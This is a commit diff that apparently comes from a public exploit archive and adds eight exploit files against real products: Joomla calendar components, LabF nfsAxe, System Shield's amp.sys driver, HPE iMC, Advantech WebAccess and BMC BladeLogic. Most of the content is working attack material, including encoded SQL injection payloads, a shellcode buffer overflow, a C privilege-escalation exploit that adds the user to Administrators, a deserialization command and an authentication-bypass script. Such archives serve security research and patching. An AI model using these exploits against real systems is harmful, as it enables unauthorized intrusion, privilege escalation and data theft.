DB: 2018-01-31

8 changes to exploits/shellcodes LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow System Shield 5.0.0.136 - Privilege Escalation HPE iMC 7.3 - RMI Java Deserialization Advantech WebAccess < 8.3 - SQL Injection Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal Joomla! Component CP Event Calendar 3.0.1 - 'id' SQL Injection Joomla! Component Visual Calendar 3.1.3 - 'id' SQL Injection BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure
2018-01-31 05:01:49 +00:00 · 2018-01-31 05:01:49 +00:00 · 62ce2d17ed
commit 62ce2d17ed
parent ef96c0511b
9 changed files with 839 additions and 0 deletions
--- a/exploits/php/webapps/43931.txt
+++ b/exploits/php/webapps/43931.txt
@ -0,0 +1,24 @@
+# # # # #
+# Exploit Title: Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal
+# Dork: N/A
+# Date: 30.01.2018
+# Vendor Homepage: http://www.joomlacalendars.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/picture-calendar-for-joomla/
+# Version: 3.1.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6397
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# Directory Traversal...
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/list.php?folder=[DIRECTORY]
+# 
+# # # # #
--- a/exploits/php/webapps/43932.txt
+++ b/exploits/php/webapps/43932.txt
@ -0,0 +1,43 @@
+# # # # #
+# Exploit Title: Joomla! Component CP Event Calendar 3.0.1 - SQL Injection
+# Dork: N/A
+# Date: 30.01.2018
+# Vendor Homepage: http://www.joomlacalendars.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/cp-event-calendar/
+# Version: 3.0.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6398
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_cpeventcalendar&task=load&id=[SQL]
+# 
+# %2d%31%20%20%2f%2a%21%30%36%36%36%36%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%36%36%36%36%53%45%4c%45%43%54%2a%2f%20CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d
+# 
+# Parameter: id (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: option=com_cpeventcalendar&task=load&id=1 AND 6741=6741
+# 
+#     Type: error-based
+#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+#     Payload: option=com_cpeventcalendar&task=load&id=1 AND (SELECT 7531 FROM(SELECT COUNT(*),CONCAT(0x716a707671,(SELECT (ELT(7531=7531,1))),0x717a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL <= 5.0.11 AND time-based blind (heavy query - comment)
+#     Payload: option=com_cpeventcalendar&task=load&id=1 AND 3954=BENCHMARK(5000000,MD5(0x4573626a))#
+# 
+#     Type: UNION query
+#     Title: Generic UNION query (NULL) - 7 columns
+#     Payload: option=com_cpeventcalendar&task=load&id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a707671,0x4a61716b6d59557a4f5a496f7676584d57444e514d4d78626d42546e786d79747350424271687555,0x717a6a7a71),NULL,NULL,NULL-- cJFi
+# 
+# # # # #
--- a/exploits/php/webapps/43933.txt
+++ b/exploits/php/webapps/43933.txt
@ -0,0 +1,41 @@
+# # # # #
+# Exploit Title: Joomla! Component Visual Calendar 3.1.3 - SQL Injection
+# Dork: N/A
+# Date: 30.01.2018
+# Vendor Homepage: http://www.joomlacalendars.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/visual-calendar/
+# Version: 3.1.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6395
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_visualcalendar&view=load&id=[SQL]
+# 
+# -1%20%20/*!06666UNION*/%20/*!06666SELECT*/%20(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)%2c0x32%2c0x33%2c0x34%2c0x35%2c0x36%2d%2d%20%2d
+# 
+# -1%20%20/*!06666UNION*/%20/*!06666SELECT*/%201%2c0x32%2c(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)%2c0x34%2c0x35%2c0x36%2d%2d%20%2d
+# 
+# Parameter: id (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 AND 2616=2616
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 AND SLEEP(5)
+# 
+#     Type: UNION query
+#     Title: Generic UNION query (NULL) - 6 columns
+#     Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 UNION ALL SELECT CONCAT(0x716a627a71,0x586a6c7676787a6f684c73745863744b7955784a47534d58797158564a53716d6b57434f6141536c,0x71786b6a71),NULL,NULL,NULL,NULL,NULL-- QpYd
+# 
+# # # # #
--- a/exploits/windows/dos/43930.py
+++ b/exploits/windows/dos/43930.py
@ -0,0 +1,70 @@
+#!/usr/bin/python
+########################################################################################################
+# Exploit Author: Miguel Mendez Z
+# Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow 
+# Date: 29-01-2018
+# Software: LabF nfsAxe
+# Version: v3.7
+# Vendor Homepage: http://www.labf.com
+# Software Link: http://www.labf.com/download/nfsaxe.exe
+# Tested on: Windows 7 x86
+########################################################################################################
+
+import struct
+
+ropAlignEsp = (
+"\x83\xEC\x58" #SUB ESP,58
+"\x83\xEC\x58"  #SUB ESP,58
+"\x83\xEC\x58"  #SUB ESP,58
+"\x83\xEC\x58"  #SUB ESP,58
+"\x83\xEC\x10"  #SUB ESP,10
+"\xFF\xE4"      #JMP ESP
+)
+
+scode  = "\xB9\xEF\xEE\xEE\xEE"     #MOV ECX,EEEEEEEF
+scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111
+scode += "\x51"                     #PUSH ECX
+scode += "\x68\x31\x30\x73\x21"     #PUSH 31307321
+scode += "\x68\x73\x31\x6b\x72"     #PUSH 73316b72
+scode += "\x68\x5f\x62\x79\x5f"     #PUSH 5f62795f
+scode += "\x68\x70\x77\x6e\x64"     #PUSH 70776e64
+scode += "\x68\x42\x30\x66\x5f"     #PUSH 4230665f
+scode += "\x8B\xD4"                 #MOV EDX,ESP
+scode += "\x48"                     #DEC EAX
+scode += "\x50"                     #PUSH EAX
+scode += "\x52"                     #PUSH EDX
+scode += "\x52"                     #PUSH EDX
+scode += "\x50"                     #PUSH EAX
+scode += "\xBA\x11\xEA\x1A\x76"     #MOV EDX,USER32.MessageBoxA() (Change)
+scode += "\xFF\xD2"                 #CALL EDX
+#--------------
+scode += "\x33\xD2"                 #XOR EDX,EDX
+scode += "\xB9\xEF\xEE\xEE\xEE"     #MOV ECX,EEEEEEEF
+scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111
+scode += "\x51"                     #PUSH ECX
+scode += "\x68\x63\x61\x6c\x63"     #PUSH 0x63616c63
+scode += "\x8B\xD4"                 #MOV EDX,ESP
+scode += "\x52"                     #PUSH EDX
+scode += "\x33\xD2"                 #XOR EDX,EDX
+scode += "\xBA\x6F\xB1\x0F\x76"     #MOV EDX,msvcrt.system - 0x760fb16f (Change)
+scode += "\xFF\xD2"                 #CALL EDX
+#--------------
+scode += "\x50"                     #PUSH EAX
+scode += "\xB8\xE2\xBB\xB5\x75"     #MOV EAX,kernel32.ExitProcess() (Change)
+scode += "\xFF\xD0"                 #CALL EAX
+
+offset  = "Host: "+scode+"A"*(1000-len(scode))+"\n"
+offset += "File(s): "+"B"*33
+offset += struct.pack("<L",0x75A6923D) #CALL ESP ADVAPI32.DLL 
+offset += "B"*5
+offset += ropAlignEsp
+offset += "B"*(1037-37+(len(ropAlignEsp)-5))+"\n"
+offset += "Remote Dir y Local Dir: "+"C"*1000
+
+payload = offset
+print "Payload len: "+str(len(payload))
+print "Shellcode len: "+str(len(scode))
+
+file=open('tftpPoc.txt','w')
+file.write(payload)
+file.close()
--- a/exploits/windows/local/43929.c
+++ b/exploits/windows/local/43929.c
@ -0,0 +1,376 @@
+/*
+
+Exploit Title    - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation
+Date             - 29th January 2018
+Discovered by    - Parvez Anwar (@parvezghh)
+Vendor Homepage  - http://www.iolo.com/
+Tested Version   - 5.0.0.136
+Driver Version   - 5.4.11.1 - amp.sys
+Tested on OS     - 64bit Windows 7 and Windows 10 (1709) 
+CVE ID           - CVE-2018-5701
+Vendor fix url   - 
+Fixed Version    - 0day
+Fixed driver ver - 0day
+
+
+Check blogpost for details:
+ 
+https://www.greyhathacker.net/?p=1006
+ 
+*/
+
+
+#include <stdio.h>
+#include <windows.h>
+#include <aclapi.h>
+
+#pragma comment(lib,"advapi32.lib")
+
+#define MSIEXECKEY "MACHINE\\SYSTEM\\CurrentControlSet\\services\\msiserver"
+
+#define SystemHandleInformation 16
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
+
+
+typedef unsigned __int64 QWORD;
+
+
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
+{
+     ULONG       ProcessId;
+     UCHAR       ObjectTypeNumber;
+     UCHAR       Flags;
+     USHORT      Handle;
+     QWORD       Object;
+     ACCESS_MASK GrantedAccess;
+} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
+
+
+typedef struct _SYSTEM_HANDLE_INFORMATION 
+{
+     ULONG NumberOfHandles;
+     SYSTEM_HANDLE Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+
+
+typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
+     ULONG SystemInformationClass,
+     PVOID SystemInformation,
+     ULONG SystemInformationLength,
+     PULONG ReturnLength);
+
+
+
+
+QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID) 
+{
+    _NtQuerySystemInformation   NtQuerySystemInformation;
+    PSYSTEM_HANDLE_INFORMATION  pSysHandleInfo; 
+    ULONG                       i;
+    PSYSTEM_HANDLE              pHandle;
+    QWORD                       TokenAddress = 0;       
+    DWORD                       nSize = 4096;
+    DWORD                       nReturn; 
+    BOOL                        tProcess;    
+    HANDLE                      hToken;
+
+
+    if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
+    {
+        printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
+        return -1;
+    }
+
+    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
+ 	
+    if (!NtQuerySystemInformation)
+    {
+        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
+        return -1;  
+    }
+
+    do
+    {  
+        nSize += 4096;
+        pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize); 
+    } while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);
+	
+    printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken);	
+
+    for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++) 
+    {
+
+        if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken) 
+        {
+            TokenAddress = pSysHandleInfo->Handles[i].Object;	     			  
+        }
+    }
+
+    HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+    return TokenAddress;	
+}
+
+
+
+int TakeOwnership()
+{
+     HANDLE           token;
+     PTOKEN_USER      user = NULL;
+     PACL             pACL = NULL;
+     EXPLICIT_ACCESS  ea;   
+     DWORD            dwLengthNeeded;
+
+
+
+     if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token))
+     {	
+         printf("\n[-] OpenProcessToken failed %d\n\n", GetLastError());
+         ExitProcess(1);
+     }
+     printf("\n[+] OpenProcessToken successful");
+
+     if (!GetTokenInformation(token, TokenUser, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
+     {
+         printf("\n[-] Failed to initialize GetTokenInformation %d\n\n", GetLastError());
+         ExitProcess(1);
+     }
+
+     user = (PTOKEN_USER)LocalAlloc(0, dwLengthNeeded);
+
+     if (!GetTokenInformation(token, TokenUser, user, dwLengthNeeded, &dwLengthNeeded))
+     {
+         printf("\n[-] GetTokenInformation failed %d\n\n", GetLastError());
+         ExitProcess(1);
+     }
+ 
+     ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
+
+// build DACL
+
+     ea.grfAccessPermissions = KEY_ALL_ACCESS;
+     ea.grfAccessMode = GRANT_ACCESS;
+     ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT;
+     ea.Trustee.TrusteeForm = TRUSTEE_IS_SID;
+     ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
+     ea.Trustee.ptstrName = (LPTSTR)user->User.Sid; 
+
+     if (SetEntriesInAcl(1, &ea, NULL, &pACL) != ERROR_SUCCESS)
+     {
+         printf("\n[-] SetEntriesInAcl failure\n\n");
+         ExitProcess(1);
+     }    
+     printf("\n[+] SetEntriesInAcl successful");
+
+// Take ownership
+	
+     if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, user->User.Sid, NULL, NULL, NULL) != ERROR_SUCCESS)
+     {
+         printf("\n[-] Failed to obtain the object's ownership %d\n\n", GetLastError());
+         ExitProcess(1);
+     }
+     printf("\n[+] Ownership '%s' successful", MSIEXECKEY);
+
+// Modify DACL
+
+     if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pACL, NULL) != ERROR_SUCCESS)
+     {
+         printf("\n[-] Failed to modify the object's DACL %d\n\n", GetLastError());
+         ExitProcess(1);
+     }
+     printf("\n[+] Object's DACL successfully modified");
+
+     LocalFree(pACL);
+     CloseHandle(token);
+ 
+     return 0;
+}
+
+
+
+int RestorePermissions()
+{
+     PACL             pOldDACL = NULL;
+     PSID             pSIDAdmin = NULL;
+     SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;
+
+ 
+
+     printf("\n[*] Restoring all permissions and value");
+
+// Restore registry value
+
+     WriteToRegistry("%systemroot%\\system32\\msiexec.exe /V"); 
+
+// Sid for the BUILTIN\Administrators group
+
+     if (!AllocateAndInitializeSid(&SIDAuthNT, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0,  &pSIDAdmin)) 
+     {
+         printf("\nAllocateAndInitializeSid failed %d\n\n", GetLastError());
+         ExitProcess(1);
+     }
+
+// Restore key ownership
+	
+     if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, pSIDAdmin, NULL, NULL, NULL) != ERROR_SUCCESS)
+     {
+         printf("\n[-] Failed to restore the object's ownership %d\n\n", GetLastError());
+         ExitProcess(1);
+     }
+     printf("\n[+] Object's ownership successfully restored");
+
+// Take copy of parent key
+
+     if (GetNamedSecurityInfo("MACHINE\\SYSTEM\\CurrentControlSet\\Services", SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS)
+     {
+         printf("\n[-] Failed to copy parent key object's DACL %d\n\n", GetLastError());
+         ExitProcess(1);
+     }
+     printf("\n[+] Parent key object's DACL successfully saved");
+
+// Restore key permissions
+
+     if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION | UNPROTECTED_DACL_SECURITY_INFORMATION, NULL, NULL, pOldDACL, NULL) != ERROR_SUCCESS)
+     {
+         printf("\n[-] Failed to restore the object's DACL %d\n\n", GetLastError());
+         ExitProcess(1);
+     }
+     printf("\n[+] Object's DACL successfully restored");
+
+     FreeSid(pSIDAdmin); 
+
+     return 0;
+}
+
+
+
+int WriteToRegistry(char command[])
+{
+     HKEY hkeyhandle;
+ 
+     if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\services\\msiserver", 0, KEY_WRITE, &hkeyhandle) != ERROR_SUCCESS)
+     {
+         printf("\n[-] Registry key failed to open %d\n\n", GetLastError());
+         ExitProcess(1);
+     }
+
+     if (RegSetValueEx(hkeyhandle, "ImagePath", 0, REG_EXPAND_SZ, (LPBYTE) command, strlen(command)) != ERROR_SUCCESS)
+     {
+         printf("\n[-] Registry value failed to write %d\n\n", GetLastError());
+         ExitProcess(1);
+     }
+
+     printf("\n[+] Registry key opened and value modified");
+
+     RegCloseKey(hkeyhandle);
+
+     return 0;
+}
+
+
+
+int TriggerCommand()
+{
+     STARTUPINFO           si;
+     PROCESS_INFORMATION   pi;
+
+
+     ZeroMemory(&si, sizeof(si));
+     ZeroMemory(&pi, sizeof(pi));
+     si.cb = sizeof(si);
+
+     if (!CreateProcess(NULL, "c:\\windows\\system32\\msiexec.exe /i poc.msi /quiet", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
+     {
+         printf("\n[-] CreateProcess failed %d", GetLastError());
+         ExitProcess(1);
+     }
+     printf("\n[+] c:\\windows\\system32\\msiexec.exe launched");
+     printf("\n[i] Account should now be in the local administrators group");
+
+     CloseHandle(pi.hThread);
+     CloseHandle(pi.hProcess);
+    
+     return 0;
+}
+
+
+
+int main(int argc, char *argv[]) 
+{
+    QWORD      TokenAddressTarget; 
+    QWORD      SepPrivilegesOffset = 0x40;
+    QWORD      TokenAddress;
+    HANDLE     hDevice;
+    char       devhandle[MAX_PATH];
+    DWORD      dwRetBytes = 0;  
+    QWORD      inbuffer1[3] = {0};   
+    QWORD      inbuffer2[3] = {0};      
+    QWORD      ptrbuffer[1] = {0};           // QWORD4 - Has to be 0 for arbitrary write value to be 0xfffffffe   
+    DWORD      currentusersize;
+    char       currentuser[100];
+    char       netcommand[MAX_PATH];            
+
+
+
+    printf("-------------------------------------------------------------------------------\n");
+    printf("  System Shield AntiVirus & AntiSpyware (amp.sys) Arbitrary Write EoP Exploit  \n");
+    printf("                 Tested on 64bit Windows 7 / Windows 10 (1709)                 \n");
+    printf("-------------------------------------------------------------------------------\n");
+
+    TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
+    printf("\n[i] Address of current process token 0x%p", TokenAddress);
+
+    TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
+    printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten", TokenAddressTarget);
+ 
+    inbuffer1[0] = 0x8;                      // QWORD1 - Cannot be more than 8. Also different values (<9) calculates to different sub calls
+    inbuffer1[1] = ptrbuffer;                // QWORD2 - Address used for read and write
+    inbuffer1[2] = TokenAddressTarget+1;     // QWORD3 - Arbitrary write address !!!
+
+    inbuffer2[0] = 0x8;
+    inbuffer2[1] = ptrbuffer;
+    inbuffer2[2] = TokenAddressTarget+9;
+
+    sprintf(devhandle, "\\\\.\\%s", "amp");
+
+    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+    
+    if(hDevice == INVALID_HANDLE_VALUE)
+    {
+        printf("\n[-] Open %s device failed\n\n", devhandle);
+        return -1;
+    }
+    else 
+    {
+        printf("\n[+] Open %s device successful", devhandle);
+    }	
+
+    printf("\n[~] Press any key to continue . . .\n");
+    getch();
+
+    DeviceIoControl(hDevice, 0x00226003, inbuffer1, sizeof(inbuffer1), NULL, 0, &dwRetBytes, NULL); 
+    DeviceIoControl(hDevice, 0x00226003, inbuffer2, sizeof(inbuffer2), NULL, 0, &dwRetBytes, NULL); 
+
+    printf("[+] Overwritten _SEP_TOKEN_PRIVILEGES bits\n");
+    CloseHandle(hDevice);
+    
+    currentusersize = sizeof(currentuser);
+
+    if (!GetUserName(currentuser, &currentusersize))
+    {
+        printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError());
+        return -1;
+    }
+
+    printf("[*] Adding current user '%s' account to the local administrators group", currentuser);
+
+    sprintf(netcommand, "net localgroup Administrators %s /add", currentuser);
+
+    TakeOwnership();  
+    WriteToRegistry(netcommand);  
+    TriggerCommand();
+    Sleep(1000);
+    RestorePermissions(); 
+    printf("\n\n");
+
+    return 0;
+}
--- a/exploits/windows/remote/43927.txt
+++ b/exploits/windows/remote/43927.txt
@ -0,0 +1,13 @@
+# Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability
+# Date: 01-28-2018
+# Exploit Author: Chris Lyne (@lynerc)
+# Vendor Homepage: www.hpe.com
+# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
+# Version: iMC PLAT v7.3 (E0504) Standard
+# Tested on: Windows Server 2008 R2 Enterprise 64-bit
+# CVE : CVE-2017-5792
+# See Also: http://zerodayinitiative.com/advisories/ZDI-18-137/
+
+# note that this PoC will launch calc.exe
+
+$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe
--- a/exploits/windows/webapps/43928.py
+++ b/exploits/windows/webapps/43928.py
@ -0,0 +1,98 @@
+#!/usr/bin/python2.7
+
+# Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability
+# Date: 01-13-2018
+# Exploit Author: Chris Lyne (@lynerc)
+# Vendor Homepage: www.advantech.com
+# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe
+# Version: Advantech WebAccess 8.0-2015.08.16
+# Tested on: Windows Server 2008 R2 Enterprise 64-bit
+# CVE : CVE-2017-16716
+# See Also: http://zerodayinitiative.com/advisories/ZDI-18-065/
+
+# Notes:
+#
+# There are two service interfaces:
+# 1) SOAP
+# 2) REST
+#
+# This PoC targets REST
+#
+# The web services did not work out of the box, and a new website/app was created in IIS for testing.
+# This issue was potentially due to the fact that testing was completed against a trial version.
+# PoC may need slight tweaks depending on configuration of the web service.
+#
+# Original vulnerability was reported for more recent software version.
+#
+# This WebAccessAuthBypass class can be imported :-) 
+
+import sys, requests
+from xml.etree import ElementTree
+
+class WebAccessAuthBypass:
+    def __init__(self, ip, port):
+        self.ip = ip
+        self.port = port
+        self.base_url = "http://%s:%s/BWMobileService/BWScadaRest.svc/" % (ip, port)
+        
+    def convert_entities(self, s):
+	return s.replace('>', '>').replace('<', '<') # convert html entities in response, for parsing
+
+    def get_project_list(self):
+	print 'Getting list of projects...'
+	res = requests.get(self.base_url)
+	projects = list()
+	if res.status_code != 200:
+	    print 'Bad HTTP response...'
+	else:
+	    if 'PROJECT' not in res.text:
+		print 'No projects listed by service.'
+	    else:
+		s = self.convert_entities(res.text)
+		xml = ElementTree.fromstring(s)
+		for project_list in xml:
+		    for project in project_list:
+			name = project.get('NAME')
+			if name is not None:
+			    projects.append(name)
+	if len(projects) > 0:
+	    print 'Found the following projects: ' + str(projects)
+	    return projects
+	else:
+	    return None
+
+    # returns a token
+    def login(self, project):
+	# SQL Injection into the user parameter
+	url = self.base_url + "Login/" + project + "/notadmin'%20or%20'x'%3D'x/nopass" # notadmin' or 'x'='x
+	res = requests.get(url)
+	token = None
+	if res.status_code != 200:
+	    print 'Bad HTTP response...'
+	else:
+	    if 'OK TOKEN' not in res.text:
+		print 'No token returned by service.'
+	    else:
+		s = self.convert_entities(res.text)
+		xml = ElementTree.fromstring(s)
+		if len(xml) > 0:
+		    token = xml[0].get('TOKEN')
+	return token
+
+    # token returned can be used for more transactions
+    def get_token(self):
+        project_list = self.get_project_list()
+        project = project_list[0] # might as well pick the first project
+        token = self.login(project_list[0])
+        return token
+
+if __name__ == "__main__":
+    ip = 'targetip'
+    port = 'port#'
+    bypass = WebAccessAuthBypass(ip, port)
+    token = bypass.get_token()
+
+    if token is not None:
+	print 'Successfully got an authentication token: ' + token
+    else:
+	print 'Unsuccessful.'
--- a/exploits/windows/webapps/43934.py
+++ b/exploits/windows/webapps/43934.py
@ -0,0 +1,166 @@
+# Exploit Title: BMC BladeLogic RSCD agent get Windows users
+# Filename: BMC_winUsers.py
+# Github: https://github.com/bao7uo/bmc_bladelogic
+# Date: 2018-01-27
+# Exploit Author: Paul Taylor / Foregenix Ltd
+# Website: http://www.foregenix.com/blog
+# Version: BMC RSCD agent 8.3.00.64
+# CVE: CVE-2016-5063
+# Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-windows-rscd-agent-vulnerability-in-bmc-server-automation-cve-2016-5063
+# Tested on: 8.3.00.64
+
+#!/usr/bin/python2
+
+# Retrieving Windows system users with BMC BladeLogic RSCD agent
+# Tested against v8.3.00.64 (Windows version)
+# CVE-2016-5063
+
+# Author: Paul Taylor / Foregenix Ltd
+# github.com/bao7uo/bmc_bladelogic
+# www.foregenix.com/blog
+
+# Credits:
+#    Converted to work against Windows version
+#    from the Linux BMC getUsers exploit by ERNW
+
+import socket
+import ssl
+import sys
+import requests
+import argparse
+import xml.etree.ElementTree as ET
+import xml.dom.minidom
+import httplib
+from requests.packages.urllib3 import PoolManager
+from requests.packages.urllib3.connection import HTTPConnection
+from requests.packages.urllib3.connectionpool import HTTPConnectionPool
+from requests.adapters import HTTPAdapter
+
+
+class MyHTTPConnection(HTTPConnection):
+    def __init__(self, unix_socket_url, timeout=60):
+        HTTPConnection.__init__(self, HOST, timeout=timeout)
+        self.unix_socket_url = unix_socket_url
+        self.timeout = timeout
+
+    def connect(self):
+        self.sock = wrappedSocket
+
+
+class MyHTTPConnectionPool(HTTPConnectionPool):
+    def __init__(self, socket_path, timeout=60):
+        HTTPConnectionPool.__init__(self, HOST, timeout=timeout)
+        self.socket_path = socket_path
+        self.timeout = timeout
+
+    def _new_conn(self):
+        return MyHTTPConnection(self.socket_path, self.timeout)
+
+
+class MyAdapter(HTTPAdapter):
+    def __init__(self, timeout=60):
+        super(MyAdapter, self).__init__()
+        self.timeout = timeout
+
+    def get_connection(self, socket_path, proxies=None):
+        return MyHTTPConnectionPool(socket_path, self.timeout)
+
+    def request_url(self, request, proxies):
+        return request.path_url
+
+
+def optParser():
+    parser = argparse.ArgumentParser(description="Retrieving system users with BMC BladeLogic Server Automation RSCD agent")
+    parser.add_argument("host", help="IP address of a target system")
+    parser.add_argument("-p", "--port", type=int, default=4750, help="TCP port (default: 4750)")
+    opts = parser.parse_args()
+    return opts
+
+
+init = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteServer.intro</methodName><params><param><value>2015-11-19-16-10-30-3920958</value></param><param><value>7</value></param><param><value>0;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;</value></param><param><value>8.6.01.66</value></param></params></methodCall>"""
+getVersion = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteServer.getVersion</methodName><params/></methodCall>"""
+getWindowsUsers = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteUser.getUserContents</methodName><params><param><value><struct><member><name>typeName</name><value>OS</value></member><member><name>host</name><value>0.0.0.0</value></member><member><name>container</name><value><array><data><value><struct><member><name>string</name><value></value></member><member><name>value</name><value><struct><member><name>longValue</name><value><ex:i8>1</ex:i8></value></member><member><name>kind</name><value><i4>1</i4></value></member></struct></value></member></struct></value></data></array></value></member><member><name>path</name><value>/</value></member></struct></value></param><param><value><i4>1</i4></value></param><param><value><array><data/></array></value></param><param><value><array><data/></array></value></param><param><value><array><data/></array></value></param></params></methodCall>"""
+getHostOverview = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteServer.getHostOverview</methodName></methodCall>"""
+
+options = optParser()
+PORT = options.port
